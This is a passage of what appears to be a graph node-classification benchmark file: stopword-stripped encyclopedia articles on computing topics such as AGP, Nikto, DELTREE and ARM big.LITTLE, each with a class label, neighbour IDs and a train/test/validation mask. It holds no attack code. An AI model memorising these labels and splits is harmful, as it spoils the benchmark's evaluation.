motherboards incorrectly fully open slots allowing card plugged slot support correct signaling voltage may damage card motherboard incorrectly designed older 3.3 v cards 1.5 v key proprietary systems incompatible standard agp example apple power macintosh computers apple display connector adc extra connector delivers power attached display cards designed work specific cpu architecture e.g. pc apple may work others due firmware issues mark allen playtools.com made following comments regarding practical agp compatibility agp 3.0 agp 2.0 ... nobody makes agp 3.0 cards nobody makes agp 3.0 motherboards least manufacturers find every single video card could find claimed agp 3.0 card actually universal 1.5v agp 3.0 card every motherboard claimed agp 3.0 motherboard turned universal 1.5v agp 3.0 motherboard makes sense think anyone actually shipped consumer-oriented product supported 0.8 volts would end lots confused customers support nightmare consumer market 'd crazy ship 0.8 volt product actual power supplied agp slot depends upon card used maximum current drawn various rails given specifications various versions example maximum current drawn supplies voltages specified upper limits agp 3.0 slot supply 48.25 watts figure used specify power supply conservatively practice card unlikely ever draw 40 w slot many using less agp pro provides additional power 110 w. many agp cards additional power connectors supply power slot could provide 2010 new motherboards agp slots new motherboard chipsets equipped agp support motherboards continued produced older chipsets support agp graphics processors period use pci-express general-purpose restricted graphics standard supports higher data transfer rates full-duplex create agp-compatible graphics cards chips require additional pcie-to-agp bridge-chip convert pcie signals agp signals incurs additional board costs due need additional bridge chip separate agp-designed circuit board various manufacturers graphics cards continued produce agp cards shrinking agp user-base first bridged cards geforce 6600 ati radeon x800 xl boards released 2004-5 2009 agp cards nvidia ceiling geforce 7 series 2011 directx 10-capable agp cards amd vendors club 3d sapphire jaton visiontek diamond etc included radeon hd 2400 3450 3650 3850 4350 4650 4670 hd 5000 agp series mentioned amd catalyst software never available many problems amd catalyst 11.2 11.6 agp hotfix drivers windows 7 hd 4000 series agp video cards use 10.12 11.1 agp hotfix drivers recommended workaround several vendors listed make available past versions agp drivers agp bus superset 66 mhz conventional pci bus immediately reset follows protocol card must act pci target optionally may act pci master agp 2.0 added fast writes extension allows pci writes motherboard card transfer data higher speed card initialized using pci transactions agp transactions permitted card always agp master motherboard always agp target card queues multiple requests correspond pci address phase motherboard schedules corresponding data phases later important part initialization telling card maximum number outstanding agp requests may queued given time agp requests similar pci memory read write requests use different encoding command lines c/be 3:0 always 8-byte aligned starting address length always multiples 8 bytes 64 bits three low-order bits address used instead communicate length request whenever pci gnt signal asserted granting bus card three additional status bits st 2:0 indicate type transfer performed next bits codice_1 previously queued agp transaction data transferred three bits codice_2 card may begin pci transaction sideband addressing use queue request in-band using pipe like pci agp transaction begins address phase communicating address 4-bit command code possible commands different pci however agp 3.0 dropped high-priority requests long read commands little used also mandated side-band addressing thus dropping dual address cycle leaving four request types low-priority read 0000 low-priority write 0100 flush 1010 fence 1100 queue request in-band card must request bus using standard pci req signal receive gnt plus bus status st 2:0 equal codice_2 instead asserting frame begin pci transaction card asserts pipe signal driving agp command address length c/be 3:0 ad 31:3 ad 2:0 lines respectively address 64 bits dual address cycle similar pci used every cycle pipe asserted card sends another request without waiting acknowledgement motherboard configured maximum queue depth last cycle marked deasserting req pipe deasserted following idle cycle side-band addressing supported configured pipe signal used signal re-used another purpose agp 3.0 protocol requires side-band addressing instead requests broken 16-bit pieces sent two bytes across sba bus need card ask permission motherboard new request may sent time long number outstanding requests within configured maximum queue depth possible values sideband address bytes sent rate data transfers 8× 66 mhz basic bus clock sideband addressing advantage mostly eliminates need turnaround cycles ad bus transfers usual case read operations greatly outnumber writes asserting gnt motherboard may instead indicate via st bits data phase queued request performed next four queues two priorities low- high-priority reads writes processed order obviously motherboard attempt complete high-priority requests first limit number low-priority responses may delivered high-priority request processed cycle gnt asserted status bits value codice_13 read response indicated priority scheduled returned next available opportunity typically next clock cycle motherboard assert trdy target ready begin transferring response oldest request indicated read queue pci bus signals like frame devsel irdy remain deasserted four clock cycles worth data 16 bytes agp 1× 128 bytes agp 8× transferred without waiting acknowledgement card response longer card motherboard must indicate ability continue third cycle asserting irdy initiator ready trdy respectively either one wait states inserted two cycles value irdy trdy times irrelevant usually deasserted c/be byte enable lines may ignored read responses held asserted bytes valid motherboard card may also assert rbf read buffer full signal indicate temporarily unable receive low-priority read responses motherboard refrain scheduling low-priority read responses card must still able receive end current response first four-cycle block following one scheduled plus high-priority responses requested cycle gnt asserted status bits value codice_14 write data scheduled sent across bus next available opportunity typically next clock cycle card assert irdy initiator ready begin transferring data portion oldest request indicated write queue data longer four clock cycles motherboard indicate ability continue asserting trdy third cycle unlike reads provision card delay write n't data ready send n't queued request c/be lines used write data may used card select bytes written memory multiplier agp 2× 4× 8× indicates number data transfers across bus 66 mhz clock cycle transfers use source synchronous clocking strobe signal ad_stb 0 ad_stb 1 sb_stb generated data source agp 4× adds complementary strobe signals agp transactions may short two transfers agp 4× 8× speeds possible request complete middle clock cycle case cycle padded dummy data transfers c/be byte enable lines held deasserted agp connector contains almost pci signals plus several additions connector 66 contacts side although 4 removed keying notch pin 1 closest i/o bracket b sides table looking motherboard connector contacts spaced 1 mm intervals however arranged two staggered vertical rows 2 mm space pins row odd-numbered a-side contacts even-numbered b-side contacts lower row 1.0 3.5 mm card edge others upper row 3.7 6.0 mm card edge pci signals omitted signals added",
    "neighbors": [
      3588,
      5386,
      9742,
      3472,
      8851,
      408,
      4252,
      7071,
      10658,
      2723,
      4264,
      3883,
      6187,
      8625,
      3250,
      823,
      2745,
      2623,
      455,
      1614,
      4175,
      10833,
      594,
      3923,
      3798,
      9686,
      2525,
      1501,
      2529,
      10337,
      8035,
      8931,
      10851,
      2791,
      11627,
      4334,
      7151,
      11631,
      499,
      2803,
      3317,
      3445,
      5368,
      9723,
      2941,
      2943
    ],
    "mask": "None"
  },
  {
    "node_id": 800,
    "label": 4,
    "text": "SWIPSY:swipsy swipsy firewall toolkit produced defence evaluation research agency uk later qinetiq swipsy toolkit itsec e3 equivalent common criteria eal4 evaluated product allowed additional code added security ‘ compartments ’ without affecting evaluation status toolkit swipsy security properties assured network process separation particular processes communicating one network could communicate directly network ‘ trusted mover agents ’ turn force data passed format content checkers swipsy ran trusted solaris 8 platform utilising mandatory access controls enforce separation compartments swipsy stood switch ip securely used build snmp firewall system called midass swipsy technology licensed clearswift use deep-secure line guard products swipsy used basis guard citrix ica protocol qinetiq",
    "neighbors": [
      3930,
      4404
    ],
    "mask": "None"
  },
  {
    "node_id": 801,
    "label": 3,
    "text": "Altered_Beast:altered beast altered beast 1988 beat 'em arcade game developed manufactured sega game set ancient greece follows centurion resurrected zeus rescue daughter athena order save daughter zeus transforms centurion beasts use power-ups initial arcade release ported several home video game consoles home computers including mega drive/genesis pack-in game altered beast side scrolling beat 'em game light platform elements player punch kick jump two players play player controls centurion fighting undead creatures monsters setting resembling ancient greece originally five levels graveyard underworld cavern neff palace base city dis one enemies white two-headed wolf blue mega drive version blue ox dos version upon defeat releases spirit ball power-up orb increase strength size player character three orbs turn centurion beast original version werewolf thunder weredragon werebear weretiger powerful golden werewolf beast abilities dragon flight lightning bear petrification becoming beast character face end-level boss though boss also appear regardless whether character transformed player takes long complete level upon boss defeat neff appears removes transformation orbs roman centurion died battle resurrected zeus centurion ordered zeus save daughter athena demon god called neff underworld become able withstand perils warrior gets ability collect three spirit balls level last transforms human/beast hybrid formidable power series battles journey ends dis centurion finally defeats neff rescues athena original arcade game end credits interspersed images actors costumes different characters monsters game implying whole game film production altered beast ported several platforms original release 1988 released master system pc engine hucard cd-rom² formats family computer atari st zx spectrum msx commodore 64 amstrad cpc amiga ms-dos mega drive/genesis version original pack-in game system north america europe brazil replaced sonic hedgehog hand-held version game made tiger electronics released 1988 certain differences seen several versions game like master system version single-player four levels others provided different beasts mutate humanoid lion shark form seen famicom version commodore 64 version severely rushed programmed 7 weeks mega drive version included compilations sega smash pack sega genesis collection sonic ultimate genesis collection latter two also including arcade version unlockable game wii virtual console service offers emulated versions arcade mega drive port xbox 360 xbox live arcade playstation 3 playstation network re-worked arcade version hd support online leaderboards network play sega released official ios port mega drive version late 2010 taken 2015 2017 altered beast rereleased ios android part sega forever collection game also seen 3d port nintendo 3ds digital download nintendo eshop retains original game local multiplayer also features new mode random transformations based mega drive/genesis port arcade version initial arcade release altered beast well-received game however mega drive release received somewhat negative reception 1997 next generation commented altered beast dreadful genesis game sold thousands one games available genesis n't make classic mega placed game 10 list 10 worst mega drive games time re-release wii virtual console given lukewarm reception gamespot ign describing game merely decent nostalgic value xbox live arcade re-release even described ign relic arcade heyday n't hold today altered beast guardian realms developed defunct 3d6 games published thq 2002 sequel game boy advance style original arcade game adds new features like power-ups new beast forms destructible environments playstation 2 title released sega 2005 known jūōki project altered beast japan simply altered beast europe rather serving sequel original game newer title features modern setting unconnected original game project x zone 2 ulala space channel 5 summons centurion werewolf form part solo unit attack 1990-93 series parker lewis ca n't lose season 1 episode 16 jerry stein becomes addicted video games seen playing nightmares sega genesis version altered beast 1993 matthew sweet named album altered beast game 2009 alternative rock band breaking benjamin released promo flash game altered benjamin based altered beast featured lead singer benjamin burnley main character neff rhinoceros-man form makes cameo 2012 walt disney pictures film wreck-it ralph sega formed production company stories international teaming evan cholfin film tv projects based games altered beast animated project",
    "neighbors": [
      8937,
      4043,
      10316,
      9166,
      9006
    ],
    "mask": "None"
  },
  {
    "node_id": 802,
    "label": 2,
    "text": "Loïc_Dachary:loïc dachary loïc dachary born 1965 french free software developer activist active since 1987 dachary currently contributes free software projects acts president free software foundation france speaker gnu project april association right full-time volunteer securedrop project dachary started c lisp developer 1986 1987 hired teach unix programming axis 1988 lectra launched 68k based hardware dachary led unix system v port using gnu compiler collection project completed took sabbatical 1989 create gna non-profit group development distribution free software dachary went back development tic tac toon agence france-presse afp learned c++ 1995 founded ecila search engine acquired tiscali discontinued 2001 two years dedicated fsf france dachary worked inria rfid software 2003 starting mekensleep 2004 dachary wrote poker related free software published part pokersource project 2007 hired outflop startup specialized poker software services based pokersource 2011 became free software freelancer worked xivo january 2012 loïc became involved openstack worked ceph developer 2017 working securedrop project full-time volunteer employed axis 1987 dachary offered copies free software magnetic tapes emacs gnu compiler collection internet difficult access time became distributor software working lectra project dachary created gna gna axis non profit organization 1989 although original goal gna develop free software started news mail provider connectivity news mail provider washington d.c. provided agence france-presse afp half-used satellite link 1990 gna provided mail news feeds 200 non profit organisations individuals companies gna kept distributing free software magnetic tapes compiling sources difficult dachary packaged pre-compiled binaries motorola 68000 family x86 sparc left tapes computer book store le monde en tique sold customers richard stallman occasionally visited france met dachary started spread free software year gna dachary took advantage stallman presence france organize conferences école nationale supérieure d'arts et métiers paris 8 university former school école pour l'informatique et les techniques avancées 1990 dachary took secondary role gna friend hugues lafarge became president 1996 met founders april french free sotftware ngo donated first server hosted ecila office dachary returned active role non profit work 2000 wrote code newly created sourceforge platform attempt understand project dynamics travelled va linux offices met eric raymond tim perdue felt team focused in-house interactions welcome external contributor however became familiar published code base va linux started use proprietary software created alternative platform using latest free software code base published gnu savannah early 2001 dachary secured funds buy hardware free software foundation offices moved boston install late 2001 va linux asked assign copyright contributions dachary published article explaining time move away sourceforge 2002 dachary gradually delegated responsibilities gnu savannah contributors free software foundation staff retired 2003 2001 free software foundation established presence europe dachary took part process creating fsf france renaming gna publication number 20010027 journal officiel serving first vice president fsf europe addition supporting growth gnu savannah fsf france assisted french developers companies gpl compliance bradley m. kuhn executive director free software foundation time dachary worked first contract new gpl compliance labs french governmental agency ongoing interest enforcing copyleft licenses led visible outcomes publication c cs orange sfr court case involving free kept confidential 2009 dachary joined software freedom conservancy board directors years late 2002 dachary became concerned lack protest european copyright directive transposed french law instead acting name fsf france problems limited free software launched eucd.info initiative six months full-time lobbying hired christophe espern work fsf france delegated responsibilities dachary played active role since although keeps touch friend jérémie zimmermann christophe espern successor co-founder spokesperson la quadrature du net late 2003 gnu savannah compromise created tensions governance early 2004 dachary worked mathieu roy set gna using policy software different decisional process 2010 maintainers savannah gna overlapped worked network administrator although centralized forges gna popular dachary recently gradually transgressed towards distributed hosting collects machines hosting facilities umbrella fsf france runs openstack based clusters dachary helps projects gnu compiler collection software freedom conservancy providing maintaining machines infrastructure late 2008 created amateur datacenter codename microdtc34 seven square meter room center paris laurent guerby process creating tetaneutral.net non profit isp dachary appointed honorary member april association behalf april participated commission spécialisée de terminologie et de néologie de l'informatique et des composants électroniques 2006 2009 primarily discuss definition free software shortly april 2012 openstack summit dachary founded upstream university train developers become better free software contributors",
    "neighbors": [
      1026,
      2050,
      1028,
      5644,
      2581,
      3618,
      6691,
      2109,
      8258,
      10822,
      5703,
      8263,
      589,
      4177,
      8787,
      1112,
      3674,
      8304,
      7793,
      3189,
      5759,
      2180,
      4230,
      9865,
      8848,
      657,
      6808,
      6302,
      3744,
      8354,
      4265,
      8364,
      1717,
      11447,
      2233,
      5833,
      6352,
      3802,
      4831,
      7904,
      10464,
      3817,
      8436,
      4367,
      7450,
      2332,
      10012,
      5410,
      6947,
      5931,
      6962,
      823,
      11069,
      843,
      11602,
      4437,
      6489,
      9579,
      1394,
      1396,
      1399,
      11643,
      11654,
      4493,
      10642,
      1939,
      3478,
      7584,
      11180,
      5555,
      9148,
      10687,
      4561,
      8147,
      2010,
      9696,
      8673,
      11232,
      1007,
      499,
      3068,
      3582
    ],
    "mask": "None"
  },
  {
    "node_id": 803,
    "label": 9,
    "text": "Index_of_JavaScript-related_articles:index javascript-related articles list articles related javascript programming language",
    "neighbors": [
      1409,
      4482,
      259,
      8068,
      3462,
      5255,
      6791,
      1802,
      10507,
      1295,
      916,
      1812,
      8084,
      8854,
      8858,
      5915,
      8605,
      7455,
      2977,
      1698,
      1713,
      3761,
      1203,
      11060,
      11186,
      438,
      4920,
      6143,
      189,
      5311,
      2880,
      65,
      7871,
      8384,
      4292,
      9152,
      5708,
      4045,
      7372,
      11087,
      339,
      2131,
      4822,
      5846,
      4056,
      4697,
      5592,
      603,
      9046,
      9561,
      8289,
      482,
      3683,
      362,
      9195,
      364,
      8045,
      11372,
      6127,
      10991,
      3313,
      10097,
      5622,
      7543,
      10744,
      9211,
      3839
    ],
    "mask": "Validation"
  },
  {
    "node_id": 804,
    "label": 2,
    "text": "Star_Control_II:star control ii star control ii ur-quan masters sequel star control developed toys bob fred ford paul reiche iii originally published accolade 1992 ms-dos released critical acclaim star control ii widely viewed today one greatest pc games ever made appeared numerous publications lists greatest video games time game features exoplanet abundant star systems hyperspace travel extraterrestrial life interstellar diplomacy game featuring 25 different alien races communicated game ported 3do crystal dynamics 1994 enhanced multimedia presentation allowed cd technology source code 3do port licensed gnu gpl 2002 game content creative commons license 3do code ported pc ur-quan masters sequel star control 3 released 1996 star control ii added large number species ship types already diverse cast replaced first game strategy-based scenarios story-driven space exploration adventure game included diplomacy inhabitants galaxy resource gathering sub-sections instances melee combat first game whenever diplomacy fails typical adventure game genre player must explore game world little direction make discoveries connections independently interaction various alien species chief part adventure game backstory species first games new ones fleshed considerably hours dialogue species bringing characteristic conversational quirks music even display fonts two-player mode available named super melee consisting solely ship-to-ship combat ships first game available even made appearance story along number new ones last phase war alliance free stars hierarchy battle thralls tobermoon earthling ship discovered ancient precursor subterranean installation cave surface uninhabited planet vela star system alliance hastily sent secret scientific mission study relics massive hierarchy offensive forced alliance fleets retreat beyond vela mission commander captain burton decided go hiding planet sent back tobermoon starship asking help though ur-quan forces n't find earthlings sweep system relief never arrived years later help genius child born planet colonists activated precursor machinery found programmed build starship using limited store raw materials available planet ten years precursor factory built barely functional ship could piloted grown genius child alone could interact precursor central computer first test flight discovered ship burton sent help severely damaged ur-quan orbiting unpowered outer solar system alliance never known mission discoveries colonists decided fix recovered ship train new crew members precursor ship tobermoon send mission back earth eager know war ended shortly reaching sol little fleet attacked unknown ship captain burton commanding earthling ship intercepted alien ship could damage defenseless precursor starship killed short fight leaving genius young man command player begins game commander precursor starship returns earth find enslaved ur-quan discovered rest humans allies war ur-quan either eradicated put slave shield put service ur-quan battle thralls player progresses revealed ur-quan fighting internecine war kohr-ah subspecies ur-quan believes eradicating life galaxy opposed enslaving winner war gain access sa-matra precursor starship unparalleled power player must take advantage ur-quans distraction contact recruit alien races new alliance gather resources build fleet find way destroy sa-matra ur-quan finish war become unstoppable contents soundtrack pc version determined running contest anybody could participate composing tracks based description game included soundtrack compositions aaron grier erol otus eric e. berge riku nuottajärvi kevin palivec dan nicholson president founding member kosmic free music foundation musicians searched posting contest amiga users newsgroup mostly amiga hobbyists making sample based tracker music days music protracker-mod format uses digitized instrument samples pc game music still relied fm-synthesis based instruments time game also supported gravis ultrasound sound card popular among mod composers star control ii highly influenced story game design games starflight 1986 1989 developed binary systems released variety platforms electronic arts indeed greg johnson starflight lead designer helped write dialog star control ii paul reiche iii contributed earlier game alien communication system david brin science fiction series uplift universe also often mentioned inspiration star control ii universe well larry niven known space universe addition numerous awards gaming magazines published around release star control ii also spots top games compilations notable gaming publications computer gaming world stated star control ii much sequel starflight star control reviewer praised vga graphics wrote game best dialogue ever encountered genre concluded game placed reviewer top ten list time ... one enjoyable games review year often perfect balance struck role playing adventure action/arcade 1994 survey space war games gave grade b+ stating game lacked replayability except ship-to-ship melee minigame 1994 survey strategic space games set year 2000 later gave game four-plus stars five stating offers hours 'simple hot deep play game reviewed 1993 dragon 195 hartley patricia kirk lesser role computers column reviewers gave game 5 5 stars reviewing 3do version gamepro remarked user-friendly interface makes complicated gameplay easy handle also praised impressive graphics voice acting use unique vocal inflections alien race concluded game addicting epic sci-fi adventure patient space explorers zero-gravity tacticians glued screens million hours others stay away four reviewers electronic gaming monthly likewise praised accessible interface impressive graphics complained alien voices sometimes difficult understand cited cd quality audio melee mode strong points one commented blows pc version water gave 8.25 10 star control ii nominated award 1993 game developers conference computer gaming world named magazine adventure game year eric unready next generation reviewed 3do version game rating three stars five stated 've patience spend hours digging minerals game addictive state art 1994 pc gamer us named star control ii 21st best computer game ever editors called epic thoroughly enjoyable play look year pc gamer uk named 33rd best computer game time editors wrote ever game deserved award underrated star control ii years later star control 2 remained 52nd best computer game time pc gamer 2011 version list star control remains highly ranked many best lists 1996 computer gaming world ranked 29th best pc game time calling stunning mix adventure action humor ign named star control ii 17th best game time 2005 2013 kotaku crowd sourced list best pc games time star control 2 emerging popular choice among audience gamespot also named one greatest games time addition also given eighth place gamespot list best gameworlds reader choice well third place best endings ur-quan masters uqm project aimed port star control ii modern operating systems including windows linux mac os x bsd project began 2002 original creators fred ford paul reiche iii released source code 3do version open-source gpl project renamed ur-quan masters trademark star control registered accolade 1997 acquired 1999 atari known infogrames along rest accolade assets latest version 0.7.0 released 4 july 2011 game media free use non-commercial context released creative commons by-nc-sa 2.5 license ur-quan masters adds option online multiplayer melee play something available original game ability mod game one project goals variety modifications melee released fans including versions superpowered ships numerous planets high-definition graphics version game uqm-hd subsequently released beta 2013 development uqm codebase second group semi-professional musicians called precursors created new musical tracks remixes originals ultimately releasing four remix packs optional package listened in-game replacing original music played audio player group main members jouni airaksinen alias mark vera tore aune fjellstad alias void espen gätzschmann alias tilt riku nuottajärvi original composer 1992 release fully sometimes unofficial playable port produced wii ouya android microconsole gp2x portable game system pandora handheld maemo 5-based n900 smart phone ports underway sony psp microsoft xbox",
    "neighbors": [
      3300,
      6797,
      9166,
      7983,
      823
    ],
    "mask": "Test"
  },
  {
    "node_id": 805,
    "label": 9,
    "text": "Syntax_error:syntax error computer science syntax error error syntax sequence characters tokens intended written compile-time program compile syntax errors corrected interpreted languages however syntax error may detected program execution interpreter error messages might differentiate syntax errors errors kinds disagreement errors syntax errors example would say use uninitialized variable value java code syntax error many others would disagree would classify static semantic error 8-bit home computers used basic interpreter primary user interface syntax error error message became somewhat notorious response command user input interpreter could parse syntax error may also occur invalid equation entered calculator caused instance opening brackets without closing less commonly entering several decimal points one number java following syntactically correct statement following second example would theoretically print variable hello world instead words hello world however variable java space syntactically correct line would system.out.println hello_world compiler flag syntax error given source code meet requirements language grammar type errors attempt apply ++ increment operator boolean variable java undeclared variable errors sometimes considered syntax errors detected compile-time however common classify errors static semantic errors instead syntax error many scientific calculators occur many ways including confused math errors like dividing 0 equation resulting big number non scientific calculators math errors referred errors",
    "neighbors": [
      1952,
      8262,
      5677,
      10510,
      9871,
      240,
      5395,
      4823
    ],
    "mask": "Validation"
  },
  {
    "node_id": 806,
    "label": 9,
    "text": "COFFEE_(Cinema_4D):coffee cinema 4d coffee often written c.o.f.f.e.e computer scripting language forms part cinema 4d proprietary 3d graphics application although presented acronym letters word coffee allegedly stand cinema object-oriented fery fast environment enhancer primarily comic reference java considerably famous computer language like scripting languages coffee used extend modify functionality host software technique preferable writing so-called plug-in module using traditional language c number reasons among several different aspects cinema 4d operation customised using coffee scripts notably additions user interface extensions reading writing new file formats creating texture shaders almost main functionality application accessed coffee program customised features look behave much like supplied standard coffee fairly typical curly bracket language would look familiar previous user c/c++ java perl anything along lines function object class definitions closely modelled c++ however coffee dynamically typed variables defined simple var keyword without reference type unlike similar scripting languages squirrel javascript coffee use function keyword introduce functions require return type void return like c/c++ function definition simply begins function name coffee memory management handled entirely garbage collection process essentially means looks programmer seldom needs worry however possible control process explicitly necessary 3d graphics programming makes extensive use certain mathematical techniques notably trigonometry vector arithmetic coffee well equipped area good set mathematical functions built-in vector datatype since coffee used extend cinema 4d clearly needs make use host program features extent application programming interface api possible locate 3d objects created user access internal data structures example new object created existing one modified distorted script since major purpose coffee allow new file formats used cinema api provides features useful task file input/output class available allows individual items binary data integers floating point numbers read written",
    "neighbors": [
      1952,
      2304,
      8582,
      3462,
      9714,
      9780
    ],
    "mask": "Train"
  },
  {
    "node_id": 807,
    "label": 4,
    "text": "Nikto_(vulnerability_scanner):nikto vulnerability scanner nikto free software command-line vulnerability scanner scans webservers dangerous files/cgis outdated server software problems performs generic server type specific checks also captures prints cookies received nikto code free software data files uses drive program nikto detect 6700 potentially dangerous files/cgis checks outdated versions 1250 servers version specific problems 270 servers also checks server configuration items presence multiple index files http server options attempt identify installed web servers software scan items plugins frequently updated automatically updated variations nikto one macnikto macnikto applescript gui shell script wrapper built apple xcode interface builder released terms gpl provides easy access subset features available command-line version installed along macnikto application",
    "neighbors": [
      225,
      2084,
      8582,
      10478,
      7983,
      7965
    ],
    "mask": "Test"
  },
  {
    "node_id": 808,
    "label": 6,
    "text": "DELTREE:deltree computing codice_1 short delete tree command line command microsoft operating systems spartados x freedos recursively deletes entire subdirectory files ibm microsoft introduced pc-dos 1.0 ms-dos 1.0 subdirectories yet supported state affairs remedied release dos 2.0 introduced support subdirectories directory nesting however built-in facility deleting entire subdirectory trees release ms-dos 5.0 removing nested subdirectories required removing files lowest subdirectories removing subdirectory repeating process directory tree 1991 least one competing product dr-dos introduced well-received utility enabled recursive file deletion introduction ms-dos 6.0 microsoft regained parity adding codice_1 command codice_1 retained windows 9x shipped windows nt family operating systems instead codice_4 alias codice_5 command removes subdirectory along files codice_6 command-line switch given ms-dos pc-dos windows 9x codice_1 implemented external command functionality kept separate file outside command.com normal operation prompted user verification specified directories indeed intended removed safeguard could suppressed command-line option unlike commands operated file system multiple directories could passed command one time undocumented feature allowed user append trailing character directory name order preserve directory remove everything underneath theory deleted material could recovered freedos version developed charles dye licensed gpl command-syntax codice_1 designed ignore file directory attributes hidden read-only system command described potentially dangerous capable wiping hundreds files time combined purge command prevented data recovery became example worst-case payload malware well figuring one early computer sabotage trials contributing problem fact ms-dos windows 9x support discretionary access control mitigate issue windows nt family furthermore starting windows vista mandatory access control user account control mitigate issue",
    "neighbors": [
      3970,
      8834,
      6148,
      10631,
      2568,
      6281,
      6797,
      3856,
      8976,
      6674,
      532,
      4248,
      537,
      8729,
      4001,
      4771,
      292,
      7847,
      808,
      7983,
      7088,
      10033,
      178,
      9780,
      1978,
      7356,
      5437,
      7486,
      10428,
      960,
      8517,
      1741,
      4174,
      9166,
      10580,
      1750,
      9946,
      7515,
      10727,
      6120,
      6506,
      9709,
      1647,
      9839,
      2545,
      4850,
      7411,
      8692,
      11249,
      3323,
      6396
    ],
    "mask": "None"
  },
  {
    "node_id": 809,
    "label": 4,
    "text": "Double_switching:double switching double switching double cutting double breaking practice using multipole switch close open positive negative sides dc electrical circuit hot neutral sides ac circuit technique used prevent shock hazard electric devices connected unpolarised ac power plugs sockets double switching crucial safety engineering practice railway signalling wherein used ensure single false feed current relay unlikely cause wrong-side failure example using redundancy increase safety reduce likelihood failure analogous double insulation double switching increases cost complexity systems employed example extra relay contacts extra relays technique applied selectively provide cost-effective safety improvement landslip washaway detector buried earth embankment opens circuit landslide occur possible guarantee wet earth embankment complete circuit supposed break circuit double cut positive negative wires wet conductive earth likely blow fuse one hand short detecting relay hand either almost certain apply correct warning signal clapham junction rail crash 1988 caused part lack double switching known double cutting british railway industry signal relay question switched hot side return current came back unswitched wire loose wire bypassed contacts train detection relays switched signal allowing signal show green fact stationary train ahead 35 people killed resultant collision similar accident united airlines flight 811 caused part single-switched safety circuit baggage door mechanism failure wiring insulation circuit allowed baggage door unlocked false feed leading catastrophic de-pressurisation deaths nine passengers study railway electrical signalling new south wales 1900s shows ever increasing proportion double switching compared single switching double switching course cost wires relay contacts testing hand double switching inherently less prone wrong side failures helps overcome short-circuit faults hard test partial double switching might double switch lever controls track circuits one signal next single switching track circuits less critical overlap beyond next signal double switching facilitated modern relays contacts less space",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 810,
    "label": 3,
    "text": "ARM_big.LITTLE:arm big.little arm big.little heterogeneous computing architecture developed arm holdings coupling relatively battery-saving slower processor cores little relatively powerful power-hungry ones big typically one side active cores access memory regions workloads swapped big little cores fly intention create multi-core processor adjust better dynamic computing needs use less power clock scaling alone arm marketing material promises 75 savings power usage activities commonly arm big.little architectures used create multi-processor system-on-chip mpsoc october 2011 big.little announced along cortex-a7 designed architecturally compatible cortex-a15 october 2012 arm announced cortex-a53 cortex-a57 armv8-a cores also intercompatible allow use big.little chip arm later announced cortex-a12 computex 2013 followed cortex-a17 february 2014 cortex-a12 cortex-a17 also paired big.little configuration cortex-a7 given library cmos logic active power increases logic switches per second leakage increases number transistors cpus designed run fast different cpus designed save power fast out-of-order cpu loafing low speeds cpu much less leakage fewer transistors could work example might use smaller fewer transistors memory cache simpler microarchitecture pipeline big.little way optimize cases power speed system practice big.little system surprisingly inflexible one issue number types power clock domains ic provides may match standard power management features offered operating system another cpus longer equivalent abilities matching right software task right cpu becomes difficult problems solved making electronics software flexible three ways different processor cores arranged big.little design depending scheduler implemented kernel clustered model approach first simplest implementation arranging processor identically-sized clusters big little cores operating system scheduler see one cluster time load whole processor changes low high system transitions cluster relevant data passed common l2 cache active core cluster powered one activated cache coherent interconnect cci used model implemented samsung exynos 5 octa 5410 cpu migration via in-kernel switcher iks involves pairing 'big core 'little core possibly many identical pairs one chip pair operates one so-termed virtual core one real core fully powered running time 'big core used demand high 'little core employed demand low demand virtual core changes high low incoming core powered running state transferred outgoing shut processing continues new core switching done via cpufreq framework complete big.little iks implementation added linux 3.11. big.little iks improvement cluster migration main difference pair visible scheduler complex arrangement involves non-symmetric grouping 'big 'little cores single chip could one two 'big cores many 'little cores vice versa nvidia created something similar low-power 'companion core tegra 3 system-on-chip powerful use model big.little architecture heterogeneous multi-processing hmp enables use physical cores time threads high priority computational intensity case allocated big cores threads less priority less computational intensity background tasks performed little cores model implemented samsung exynos starting exynos 5 octa series 5420 5422 5430 apple mobile application processors starting apple a11 paired arrangement allows switching done transparently operating system using existing dynamic voltage frequency scaling dvfs facility existing dvfs support kernel e.g codice_1 linux simply see list frequencies/voltages switch sees fit like existing hardware however low-end slots activate 'little core high-end slots activate 'big core alternatively cores may exposed kernel scheduler decide process/thread executed required non-paired arrangement could possibly also used paired cores poses unique problems kernel scheduler least modern commodity hardware able assume cores smp system equal rather heterogeneous may 2017 arm announced dynamiq successor big.little dynamiq expected allow flexibility scalability designing multi-core processors contrast big.little increases maximum number cores cluster 8 allows varying core designs within single cluster 32 total clusters technology also offers fine grained per core voltage control faster l2 cache speeds however dynamiq incompatible previous arm designs initially supported cortex-a75 cortex-a55 cpu cores",
    "neighbors": [
      644,
      9863,
      392,
      9226,
      6926,
      146,
      7699,
      11282,
      2838,
      7833,
      6391,
      1057,
      2339,
      5417,
      8237,
      7983,
      10675,
      8501,
      10562,
      9155,
      6981,
      2635,
      1871,
      1872,
      9042,
      980,
      10966,
      6495,
      99,
      8036,
      9964,
      5358,
      6001,
      5363,
      373,
      1014,
      3575,
      6268
    ],
    "mask": "Validation"
  },
  {
    "node_id": 811,
    "label": 2,
    "text": "Installer_(macOS):installer macos installer application included macos progenitors openstep nextstep extracts installs files .pkg packages created next maintained apple inc. purpose help software developers create uniform software installers installer launches package metapackage file opened installation process vary substantially installer allows developers customize information user presented example made display custom welcome message software license readme installer also handles authentication checks packages valid installing allows developers run custom scripts several points installation process installer packages file extension prior mac os x leopard installer packages implemented mac os x packages packages collection files resided folders .pkg file extension mac os x leopard software packaging method changed use xar extensible archiver file format directory tree containing files packaged xar archive file extension instead distributing multiple files package allowed software files contained single file easier distribution benefit package signing",
    "neighbors": [
      2050,
      4615,
      5647,
      1042,
      6700,
      4657,
      1074,
      9780,
      576,
      9802,
      5713,
      3670,
      4184,
      2141,
      4702,
      2149,
      10857,
      8303,
      4721,
      6771,
      2676,
      7806,
      9343,
      4737,
      3719,
      10888,
      11402,
      8852,
      1686,
      7318,
      3228,
      2207,
      1699,
      5292,
      8877,
      1710,
      3766,
      2232,
      9912,
      9406,
      1729,
      6849,
      713,
      9418,
      3790,
      4309,
      9430,
      3289,
      4318,
      741,
      231,
      9451,
      2288,
      7928,
      8441,
      7422,
      11521,
      2819,
      1796,
      9487,
      10512,
      4888,
      11037,
      3371,
      7983,
      10036,
      4406,
      9529,
      4933,
      9035,
      1878,
      1379,
      4457,
      9100,
      9109,
      1439,
      11184,
      4532,
      965,
      6093,
      7118,
      3035,
      4571,
      4068,
      5093,
      487,
      10221,
      5619,
      11257,
      7163
